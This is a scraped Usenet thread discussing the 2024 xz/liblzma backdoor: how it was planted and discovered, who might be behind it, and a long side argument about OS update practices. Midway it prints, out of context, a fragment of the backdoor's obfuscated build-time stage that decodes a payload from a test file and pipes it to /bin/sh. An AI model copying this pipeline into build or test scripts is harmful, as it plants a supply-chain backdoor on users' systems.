Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
"Indira" <indira@ghandi.net> wrote
| Can someone explain how this happened?
|
| https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
|
| Was it an insider who did it, or an outsider (China perhaps, for example)?
It appears that no one really knows: https://news.ycombinator.com/item?id=39865810
It shouldn't be surprising. It's a massive web of constantly
changing software, overseen by a massive boys' club of geeks,
constantly forcing dripfeed updates onto Linux installs. As the
saying goes, "What could go wrong?"
The pattern is endemic to Linux culture: The OS itself is
an ongoing project
My install of OpenSuse would be downloading
hundreds of micro-updates per week if I didn't stop it.
I never chose any setting telling it to function as unsupervised
spyware, constantly calling home for updates.
The
whole approach is a ridiculous mess. How could quality control
possibly be carried out on so many constant changes?
Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:
Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
Summary based on my reading of various posts and emails (not guaranteed
to be complete, or completely current/accurate)
Bad actor weasles their way into the xz/liblzma project (the owner/maintainer of the project seems to be an overworked one-man-band, and while the project is peripheral to major systems, it is still part of the necessary infrastructure).
Bad actor builds up enough good will to be named as a co-maintainer of the project.
Bad actor gradually (over the course of a couple of years) checks in various patches that, under a seemingly complex set of build requirements (X86 Linux, debian or redhat derivative with systemd, etc), causes liblzma code to manipulate
the internals of sshd to backpatch it with an RCE backdoor.
The bad actor used a vaguely chinese name, and hid behind a VPN with a public endpoint in (IIRC) Singapore. BUT, there's no obvious way to tie such an anonymous
actor to a specific country; names can be assumed, VPNs can disguise locations,
and the email address was a generic gmail address available worldwide.
As for the discovery: a Postgresql developer was performing some tuning, and found a half-second discrepancy in how long it took sshd to authenticate connections. Much deep diving with profiling tools later, the developer tracked
down the delay and found all the mess that the bad actor installed.
The developer reported it to various interested parties two days ago, and the story unfolded from there.
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
I've had to make efforts to block these unknown updates
in both Win10 and Suse. (And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home. It told me I had 360 updates waiting. What are
they? Who knows. Most of the ames are not informative, even
if I wanted to look through 360 updates. It's nuts. I didn't
agree to be a beta testing volunteer for programmers who
can't stop fiddling. I'm guessing they may spend more time
rebuilding the install package than actually writing the software.)
The way it used to work is that software was thoroughly
tested before release. Then another version might come out
in maybe a year. At that point people might try it out, or they
might wait for reviews. And one could easily find a list of
actual changes in the new version. Most of my Windows software
hasn't been updated in ages and still works fine. But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
Apple is a different thing. They serve a consumer-only audience,
updating periodically with stable releases and quickly dropping
support for older products. Their aim is to sell a lot of very
dependable devices to a tech-illiterate customer base, which is
a different business model.
If someone screws up and needs to issue a fix, that's fine.
But it shouldn't happen very often. An OS on a computer that's
actually in use shouldn't be getting dripfeed updates. It should
be getting updates rarely and then with good reason. MS know that.
That's why they let corporate customers update periodically and
test out the changes before rolling them out.
"Indira" <indira@ghandi.net> wrote
| Can someone explain how this happened?
|
| https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
|
| Was it an insider who did it, or an outsider (China perhaps, for example)?
It appears that no one really knows: https://news.ycombinator.com/item?id=39865810
It shouldn't be surprising. It's a massive web of constantly
changing software, overseen by a massive boys' club of geeks,
constantly forcing dripfeed updates onto Linux installs. As the
saying goes, "What could go wrong?"
The pattern is endemic to Linux culture: The OS itself is
an ongoing project and social adhesive -- forever a work in
progress and never a finished, smooth, thoroughly tested
product. My install of OpenSuse would be downloading
hundreds of micro-updates per week if I didn't stop it. I
never chose any setting telling it to function as unsupervised
spyware, constantly calling home for updates. The
whole approach is a ridiculous mess. How could quality control
possibly be carried out on so many constant changes? Linux
is perennial beta software. Worse, loyalty to beta as a norm
is expected in Linux culture.
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Was it an insider who did it, or an outsider (China perhaps, for example)?
The developer reported it to various interested parties two days ago, and the story unfolded from there.
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw--lzma1 -dc|/bin/sh
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
I've had to make efforts to block these unknown updates
in both Win10 and Suse.
my firewall down briefly after a week or two when Suse couldn't
call home.
It told me I had 360 updates waiting. What are
they?
I didn't
agree to be a beta testing volunteer for programmers who
can't stop fiddling. I'm guessing they may spend more time
rebuilding the install package than actually writing the software.)
The way it used to work is that software was thoroughly
tested before release.
Then another version might come out
in maybe a year.
And one could easily find a list of
actual changes in the new version.
Most of my Windows software
hasn't been updated in ages and still works fine.
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
Apple is a different thing. They serve a consumer-only audience,
updating periodically with stable releases and quickly dropping
support for older products.
If someone screws up and needs to issue a fix, that's fine.
But it shouldn't happen very often. An OS on a computer that's
actually in use shouldn't be getting dripfeed updates.
be getting updates rarely and then with good reason. MS know that.
That's why they let corporate customers update periodically and
test out the changes before rolling them out.
On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:
Was it an insider who did it, or an outsider (China perhaps, for example)?
Who did it?
Your mum. Just kidding, it was GCHQ in Cheltnam. Just kidding, it was
Russia. Just kidding, it was China. Just kidding, it was America. Just kidding, it was definitely your mum.
How advanced was the threat actor?
The backdoor attempt was a very serious one, with a very high bar of knowledge, research, development and tradecraft to reach this far into the Linux ecosystem. Additionally, changes made by the threat actor on Github span multiple years,
and include things like introducing functions
incompatible with OSS Fuzzer due to outstanding small issues since 2015,
then getting OSS Fuzzer to exclude XZ Utils from scanning last year. The backdoor itself is super well put together, and even includes the ability
to remotely deactivate and remove the backdoor via a kill command.
https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
I've had to make efforts to block these unknown updates
in both Win10 and Suse. (And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home. It told me I had 360 updates waiting. What are
they? Who knows. Most of the ames are not informative, even
if I wanted to look through 360 updates.
It's nuts. I didn't
agree to be a beta testing volunteer for programmers who
can't stop fiddling. I'm guessing they may spend more time
rebuilding the install package than actually writing the software.)
The way it used to work is that software was thoroughly
tested before release. Then another version might come out
in maybe a year.
t that point people might try it out, or they
might wait for reviews. And one could easily find a list of
actual changes in the new version. Most of my Windows software
hasn't been updated in ages and still works fine. But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
Apple is a different thing. They serve a consumer-only audience,
updating periodically with stable releases and
quickly dropping
support for older products.
Their aim is to sell a lot of very
dependable devices to a tech-illiterate customer base, which is
a different business model.
If someone screws up and needs to issue a fix, that's fine.
But it shouldn't happen very often. An OS on a computer that's
actually in use shouldn't be getting dripfeed updates.
It should
be getting updates rarely and then with good reason. MS know that.
That's why they let corporate customers update periodically and
test out the changes before rolling them out.
"Carlos E.R." <robin_listas@es.invalid> wrote
| > The way it used to work is that software was thoroughly
| > tested before release. Then another version might come out
| > in maybe a year. At that point people might try it out, or they
| > might wait for reviews. And one could easily find a list of
| > actual changes in the new version. Most of my Windows software
| > hasn't been updated in ages and still works fine. But Microsoft and
| > Linux are now both guilty of seat-of-the-pants updating. If it
| > isn't stopped, Windows will show a message at boot every few
| > days: "Please wait. Installing updates."
|
| You should read "The cathedral and the bazaar".
|
That's addressing how to develop software. But then there's
the point at which the software is done, thoroughly tested,
and put to use. It needs to be well designed and stable. It
needs to do what people need. Then it needs to stay put.
Software shouldn't be a sexy business, with constant redesign.
What happens more often than not in the Linux world might
be called the greasemonkey syndrome. That's the case where
someone has a car on his front lawn and continually works
on tuning it up, adding scoops, and so on. He never quite gets
around to driving the car. He just likes to tinker.
For all Microsoft's faults, there's the advantage that their business depends on business users. So Windows has to be stable, it has to
have a well documented API, and backward compatibility is critical
because businesses build their own inhouse software. I can write
software today on Windows that runs on every Windows machine in
the world, with no support files needed. With Macs one gets 2-3
years backard compatibility. With Linux it's a moving target. I'm
still using a 25 year old Paint Shop Pro on my 23 year old WinXP.
I'm still using current Firefox on 14 year old Win7. I had to update
my 4 year old Raspberry Pi OS because it couldn't run the latest
Chromium. It could only run Chromium 92, released in 2021. The
whole thing has to be periodically replaced.
"Carlos E.R." <robin_listas@es.invalid> wrote:
Bad actor probably paid by some country or mafia with money and resources. >>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
On 31/03/2024 20.17, Newyana2 wrote:
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also
are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
That was the feeling one got reading, bashing on open source development model, which in reality don't be that much different from remote working setups with the exception that developers not gone trough a silly
interview.
I've had to make efforts to block these unknown updates
in both Win10 and Suse.
In microsoft updates you can't opt out from specific updates, everything
is bundled together, while for example with Suse you can block specific packages from being updated (in the long run you may get a dependency
issue, not my problem).
; (And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home.
What you call for calling home for Suse is just a fetch of the latest
status on what packages exists in the remote repository and some
metadata, so it's one way communication, sure the remote end could store your IP and which repository you was fetching from.
It's on your local system that the calculation is done which packages
are needed to be installed to get everything up to latest version.
This differs much from the microsoft way, which you tell everything to microsoft and they tell you what to install.
Please don't be stupid, keep your stuff up to date, it's not about you,
but it's about everyone else as when you are part of a botnet everyone
else will be affected of your bad decisions.
"J.O. Aho" <user@example.net> wrote
| Please don't be stupid, keep your stuff up to date, it's not about you,
| but it's about everyone else as when you are part of a botnet everyone
| else will be affected of your bad decisions.
|
Now that you mention it, that sounds like good advice.
I am too stupid to manage security on my computer. I'm
not even a Linux engineer. So I'll do as you recommend.
I think my compression libs are out of date and I've heard
there's a nifty one called "xz". Maybe I'll get that. When do
you advise me to update it again? This afternoon? Or is
tonight good enough? :)
"Carlos E.R." <robin_listas@es.invalid> wrote
| > That's addressing how to develop software. But then there's
| > the point at which the software is done, thoroughly tested,
| > and put to use. It needs to be well designed and stable. It
| > needs to do what people need. Then it needs to stay put.
|
| Software is never done.
|
The normalization of that view is what's led to the acceptance
of a seat-of-the-pants rolling beta approach. Your statement
has no context. A lot of software is more than done. If the
software does what you need and it's stable, why would you
dump it for something else?
of it is 25 years old. It works dependably. It doesn't need
security patches.
J.O. makes a valid case for security with software that goes online.
OK. (Even though that's rather ironic in this particular thread.)
But security isn't just a matter of putting fingers in the dike once
a week. It's about making a solid product in the first place and
then dealing with risk.
For instance, Firefox updates about every 10 days. Why?
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
On 3/31/2024 2:11 PM, Lew Pitcher wrote:[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary
on a
system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes) Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is
counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your
On 31/03/2024 19:17, Newyana2 wrote:[...]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense
to have as many users as possible on the latest and most up-to-date OS version.
Charging for updates means users won't update in a timely manner and
that leaves MS with the headache of having to support multiple versions concurrently which is expensive and inefficient.
["Followup-To:" header set to alt.os.linux.]
Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
I think I've heard of Windows ignoring that sometimes.
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active
hours'.
And "at boot every few days"!? My system is up from one monthly update >> > cycle to the next, no silly business with booting in between.
[...]
I think I've heard of Windows ignoring that sometimes.
I think you've heard wrong. Never happened to me (for two systems,
Windows 10 and 11) and I can't think of a scenario where it (your set
'Active hours') could be ignored.
You also can set Windows Update to pause for 1, 2, 3, 4 or 5 weeks and
you can reset that pause before it runs out, so you can pause
indefinitely.
Bad actor probably paid by some country or mafia with money and resources. >>>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
Wrong. The source code of xz was compromised.
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped
selling OS updates - which Microsoft still kinda does - as it made sense
to have as many users as possible on the latest and most up-to-date OS
version.
Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever
since Windows 7 (2009!), till today (Windows 11).
Of course you can still buy full licenses, for systems which come
without one, but those are not upgrades.
Charging for updates means users won't update in a timely manner and
that leaves MS with the headache of having to support multiple versions
concurrently which is expensive and inefficient.
Aside from Microsoft not charging for upgrades or updates, Wikipedia
tells me that Apple also still supports three versions of macOS (12, 13
and 14),
with - I'm sure - their subversions,
while Microsoft supports
two Windows versions (10 and 11), with - to some extent - their
subversions. So I don't think Apple and Microsoft are all that
different in this respect. (Only the number of years spanning those
versions is much shorter for Apple than for Microsoft (less than 3
versus nearly 9).)
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT):
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that 'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
On 01/04/2024 16:19, Frank Slootweg wrote:
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped >> selling OS updates - which Microsoft still kinda does - as it made sense >> to have as many users as possible on the latest and most up-to-date OS
version.
Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever since Windows 7 (2009!), till today (Windows 11).
I thought the upgrade to 10 from 7/8 was only free for a while? It also certainly wasn't "transparent" upgrade.
Of course you can still buy full licenses, for systems which come without one, but those are not upgrades.
Although, anyone can use Win10 for free as long as they ignore the
subtle 'nag' from MS. No idea why they still charge so much for Windows. Maybe it's so they can justify the costs to OEMs?
I think the biggest difference is that macOS users quickly transition to
the latest version as it's released: https://www.statista.com/statistics/944559/worldwide-macos-version-market-share/[1]
Whereas windows users like to stick with what they know and Win10 is
still the dominant version with >60% with a mishmash of subversions.
[1] this has highlighted a funny quirk that so many websites can't parse
a macOS user agent version that starts with anything other than 10.x
that ever since the relase of macOS 11 all Macs are reporting the same
UA which is frozen at 10.15. https://bugzilla.mozilla.org/show_bug.cgi?id=1679929
when did Gates first call Linux a 'cancer'
Software is never done.
badsector writes:
when did Gates first call Linux a 'cancer'
That was Ballmer. He was evidently terrified of Linux.
Chris <ithinkiam@gmail.com> wrote:
On 01/04/2024 16:19, Frank Slootweg wrote:
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped >>>> selling OS updates - which Microsoft still kinda does - as it made sense >>>> to have as many users as possible on the latest and most up-to-date OS >>>> version.
Maybe you can still buy some Microsoft Windows upgrades for some niche
corner cases, but effectively all Windows upgrades have been free, ever
since Windows 7 (2009!), till today (Windows 11).
I thought the upgrade to 10 from 7/8 was only free for a while? It also
certainly wasn't "transparent" upgrade.
Yes, Microsoft has been sending mixed messages about this and there
may have been gaps when the previous free period was over and the next
free period was not yet there. After all, one can't use Microsoft and consistent in one sentence, can one!? :-) Anyway, my wife's 8.1 to 10
upgrade was done in March 2023, nearly 8 years after release of 10, and
was free.
Of course you can still buy full licenses, for systems which come
without one, but those are not upgrades.
Although, anyone can use Win10 for free as long as they ignore the
subtle 'nag' from MS. No idea why they still charge so much for Windows.
Maybe it's so they can justify the costs to OEMs?
I only bought Windows 1.0 (the 386 version), never since.
["Followup-To:" header set to alt.os.linux.]
Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT):
On 3/31/2024 2:11 PM, Lew Pitcher wrote:[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary
on a
system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" >> (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is
counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on
Wikipedia and check out these guidelines on proper formatting of your
Hi, the server I am using strips binaries. Would it be possible to
provide a link?
"J.O. Aho" <user@example.net> wrote
| There is less risk of using the compromised xz tarball than using your
| current ms-windows
You're getting more glib and adversarial with each post.
The risks with Windows depend on a lot of things. As does
the risk with anything. Computers are not hacked by pixies.
They're hacked by people exploiting network communication
methods that are inherently unsafe.
If you don't want to deal with that directly then the best
you can do is to allow the dripfeed updates, run anti-virus,
minimize valuable data that you allow on your computer,
like credit card numbers, and hope that some update doesn't
break your system.
If you're actually going to deal with
security it's more complicated.
Although, anyone can use Win10 for free as long as they ignore theI only bought Windows 1.0 (the 386 version), never since.
subtle 'nag' from MS. No idea why they still charge so much for Windows.
Maybe it's so they can justify the costs to OEMs?
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT): >>> candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote: >>>> ["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
That's another wrong thing you've been told! :-)
I won't go in all the situations where it's wrong, but will just take
this example.
If I had honoured your 'Followup-To:', I would not see any responses,
i.e. also not any responses to *my own* response (which is, as I said,
about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.
So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
the good thing to do.
I hope you realize how inconsiderate and rude that is.
Also a 'Followup-To: alt.comp.os.windows-10' would have been inappropriate, because you cut off any subscribers of alt.os.linux, who
might be interested in further responses.
Bottom line: Do *not* use 'Followup-To:'.
[...]
On 4/1/2024 10:40 AM, candycanearter07 wrote:
["Followup-To:" header set to alt.os.linux.]
Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT): >>> On 3/31/2024 2:11 PM, Lew Pitcher wrote:
[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary >>> on a
system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" >>> (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is
counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on
Wikipedia and check out these guidelines on proper formatting of your
Hi, the server I am using strips binaries. Would it be possible to
provide a link?
Maybe the confusing stuff you were reading, was referring
to attachments on a page like this ?
https://seclists.org/oss-sec/2024/q1/301
For example, check out the attachments at the bottom of this message.
https://seclists.org/oss-sec/2024/q1/268
Paul
I've used Windows off and on since 3.1 which came with my first PC, but
only ever bought Win10. I used a pirate version of win98 for a long time
and then linux until I made a gaming rig.
I think my next home computer will be a mac. I'll consider this when win10 goes out of support next year.
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:Not to be confused with Thunderbird's - select
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT): >>> candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote: >>>> ["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
That's another wrong thing you've been told! :-)
I won't go in all the situations where it's wrong, but will just take
this example.
If I had honoured your 'Followup-To:', I would not see any responses,
i.e. also not any responses to *my own* response (which is, as I said,
about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.
So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
the good thing to do.
I hope you realize how inconsiderate and rude that is.
Also a 'Followup-To: alt.comp.os.windows-10' would have been inappropriate, because you cut off any subscribers of alt.os.linux, who
might be interested in further responses.
Bottom line: Do *not* use 'Followup-To:'.
[...]
"J.O. Aho" <user@example.net> wrote
| There is less risk of using the compromised xz tarball than using your
| current ms-windows
You're getting more glib and adversarial with each post.
The risks with Windows depend on a lot of things. As does
the risk with anything. Computers are not hacked by pixies.
They're hacked by people exploiting network communication
methods that are inherently unsafe.
If you don't want to deal with that directly then the best
you can do is to allow the dripfeed updates, run anti-virus,
minimize valuable data that you allow on your computer,
like credit card numbers, and hope that some update doesn't
break your system. If you're actually going to deal with
security it's more complicated.
On 4/2/2024 2:57 AM, Chris wrote:
I've used Windows off and on since 3.1 which came with my first PC, but
only ever bought Win10. I used a pirate version of win98 for a long time
and then linux until I made a gaming rig.
I think my next home computer will be a mac. I'll consider this when win10 >> goes out of support next year.
How horrible :-) Sorry for your loss.
I have three Macs in the computer room.
But, I got off the treadmill, I went cold and sober.
And here I am today :-)
I can't go into an Apple Bar, for fear of falling off the wagon.
The Apple computers are important. Other computers
are piled on top of them, and they make "great bases"
for computer stacks :-)
Now, what I want, is a computer with a single 40Gbit/sec connector,
when I'm trying to connect... a keyboard. That's my idea of convenience.
Paul
"Paul" <nospam@needed.invalid> wrote
| Both ecosystems have had supply chain attacks. There | was also an
attack carried out by a local university, for | which Linus assigned
a "permaban" on their kernel submissions. | That was an attack on
kernel.org . Whereas the XZ one is | a more general Linux one, a test
of how well the system | responds to shenanigans. | | Windows 11
shows an "Extract from" if I highlight an XZ file. | It would appear
the Insider development, is already in | the Release stream. All my
instances of XZ are .tar.xz . |
You have XZ files on Windows?
...To my mind this is all a classic case of placing the blame in the
wrong place. Clearly it's a problem is someone comes up with a hack
of remote access software. But the real problem is that software
itself. Something like SSH shouldn't be in use. Remote Desktop shouldn't be > in use. People just can't even imagine using a computer safely.
Some years ago my starving artist brother called me. He was in a
panic, explaining the "Microsoft" had called him to warn that there
could be repercussions because my brother had not paid his Windows
bill for several years.
"Carlos E.R." <robin_listas@es.invalid> wrote:
Bad actor probably paid by some country or mafia with money and resources. >>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
On Mon, 1 Apr 2024 15:20:35 +0200, Carlos E.R. wrote:
Bad actor probably paid by some country or mafia with money and resources. >>>>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
Wrong. The source code of xz was compromised.
Read that reference again, and read the other references. https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
It was sneaky. Very sneaky.
It wasn't in the source code.
It was in the packaging/testing code. https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
"The upstream xz repository and the xz tarballs have been backdoored."
Sysop: | DaiTengu |
---|---|
Location: | Appleton, WI |
Users: | 918 |
Nodes: | 10 (1 / 9) |
Uptime: | 20:10:47 |
Calls: | 12,178 |
Calls today: | 1 |
Files: | 186,523 |
Messages: | 2,235,310 |